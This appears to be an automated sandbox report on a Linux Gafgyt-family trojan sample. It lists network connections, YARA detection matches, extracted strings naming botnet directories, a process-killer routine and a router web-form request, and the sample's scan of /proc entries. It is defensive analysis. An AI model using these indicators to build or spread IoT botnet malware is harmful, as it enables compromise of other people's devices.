      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40570
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39580
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39582
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
      Source: unknownNetwork traffic detected: HTTP traffic on port 55502 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39584
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39586
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
      Source: unknownNetwork traffic detected: HTTP traffic on port 46582 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39588
      Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38106 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
      Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47486 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40560
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40564
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
      Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39570
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39572
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39574
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39576
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
      Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45244 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39578
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
      Source: unknownNetwork traffic detected: HTTP traffic on port 35082 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40558
      Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
      Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39444 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
      Source: unknownNetwork traffic detected: HTTP traffic on port 41758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40550
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40556
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40554
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
      Source: unknownNetwork traffic detected: HTTP traffic on port 35094 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
      Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
      Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
      Source: unknownNetwork traffic detected: HTTP traffic on port 36792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39560
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39562
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39564
      Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39568
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40548
      Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40546
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
      Source: unknownNetwork traffic detected: HTTP traffic on port 45712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40540
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
      Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
      Source: unknownNetwork traffic detected: HTTP traffic on port 49606 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40542
      Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52506
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
      Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52504
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
      Source: unknownNetwork traffic detected: HTTP traffic on port 38118 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39550
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
      Source: unknownNetwork traffic detected: HTTP traffic on port 39432 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52508
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39552
      Source: unknownNetwork traffic detected: HTTP traffic on port 33704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39554
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
      Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47498 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39558
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52500
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40538
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39548
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40536
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40530
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
      Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
      Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45256 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40532
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40492
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
      Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40490
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52476
      Source: unknownNetwork traffic detected: HTTP traffic on port 44376 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52474
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
      Source: unknownNetwork traffic detected: HTTP traffic on port 59878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
      Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52478
      Source: unknownNetwork traffic detected: HTTP traffic on port 56864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
      Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52480
      Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40486
      Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40484
      Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40488
      Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34562 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39490
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40482
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39492
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40480
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39494
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52486
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39496
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
      Source: unknownNetwork traffic detected: HTTP traffic on port 33236 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52484
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39498
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52488
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52490
      Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52494
      Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52492
      Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40474
      Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40472
      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40478
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40476
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39480
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40470
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39484
      Source: unknownNetwork traffic detected: HTTP traffic on port 55046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
      Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39486
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52498
      Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39488
      Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
      Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
      Source: unknownNetwork traffic detected: HTTP traffic on port 51152 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
      Source: unknownNetwork traffic detected: HTTP traffic on port 59854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
      Source: unknownNetwork traffic detected: HTTP traffic on port 44388 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40464
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40462
      Source: unknownNetwork traffic detected: HTTP traffic on port 41386 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40468
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40466
      Source: unknownNetwork traffic detected: HTTP traffic on port 40494 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40460
      Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142

      System Summary

      barindex
      Source: b3CaTUFeSZ.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: 5430.1.00007f305c400000.00007f305c42b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Process Memory Space: b3CaTUFeSZ.elf PID: 5430, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm5arm6arm7mipsmpslx86_64sh4abcdefghijklmnopqrstuvw012345678/proc/proc/%s/cmdline/proc/%d/exe/proc/%s/statusName:%s/bin/busybox/bin/systemd/usr/bintest/tmp/condi/tmp/zxcr9999/tmp/condinetwork/var/condibot/var/zxcr9999/var/CondiBot/var/condinet/bin/watchdog[killer] Failed to create child process.niugaboatnetSSHrobbinkreborcodssh.vegasecMozimoziCutieWTFOhshitdeletedbotnetdvrHelper.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86mipselppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.POST /goform/set_LimitClient_cfg HTTP/1.1
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: b3CaTUFeSZ.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: 5430.1.00007f305c400000.00007f305c42b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: Process Memory Space: b3CaTUFeSZ.elf PID: 5430, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
      Source: classification engineClassification label: mal92.troj.linELF@0/8@1/0
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/3760/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/3760/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/230/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/230/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/110/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/110/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/231/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/231/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/111/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/111/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/232/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/232/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/112/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/112/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/233/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/233/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/113/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/113/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/234/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/234/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/114/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/114/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/235/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/235/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/115/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/115/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/236/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/236/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/116/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/116/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/237/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/237/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/117/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/117/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/238/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/238/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/118/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/118/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/239/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/239/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/5379/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/5379/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/119/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/119/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/914/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/914/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/3636/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/3636/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/10/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/10/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/917/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/917/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/11/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/11/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/12/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/12/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/13/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/13/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/5274/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/5274/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/14/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/14/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/15/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/15/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/16/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/16/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/17/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/17/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/18/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/18/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/19/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/19/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/240/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/240/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/3095/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/3095/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/120/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/120/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/241/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/241/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/121/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/121/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/242/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/242/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/1/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/1/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/122/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/122/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/243/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/243/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/2/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/2/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/123/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/123/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/244/statusJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/244/cmdlineJump to behavior
      Source: /tmp/b3CaTUFeSZ.elf (PID: 5435)File opened: /proc/3/statusJump to behavior
